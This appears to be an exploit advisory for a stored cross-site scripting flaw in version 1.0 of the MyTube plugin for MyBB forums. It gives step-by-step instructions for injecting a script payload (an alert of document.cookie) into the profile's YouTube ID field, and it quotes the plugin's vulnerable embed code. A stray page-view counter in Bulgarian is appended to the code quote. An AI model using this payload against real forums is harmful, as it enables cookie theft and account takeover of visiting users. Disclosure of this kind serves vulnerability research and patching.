# Exploit Title: MyTube MyBB Plugin Stored XSS # Date: 18/12/2012 # Exploit Author: Kim Kun Bum # Vendor by: # Software Link: http://mods.mybb.com/view/mytube # Version: 1.0 # Category:Web Security # Tested on: Windows7 Reason : Lack of input validation in Youtube ID field +--------------------------------------------------------------------------+ Stored XSS-vulnerabilities 0. install&Activate plugin 1. go to Usercp >> Edit Profile >> Youtube: 2. inject following code "http://www.youtube.com?v="</embed> <script> alert(document.cookie) </script> 3. This code will be stored as profile content. 4. Visit your profile and Can see the execution of injected script Vulnerable code in mytube.php soucre : function mytube_activate(){....<embed src="http://www.youtube.com/v/{$tubeid}{$autoplay}" type="application/x- shockwave-flash" wmode="transparent" width="425" height="344"></embed></object></td></tr>}Брой прочитания на тази страница: 944
MyTube MyBB Plugin 1.0 Stored XSS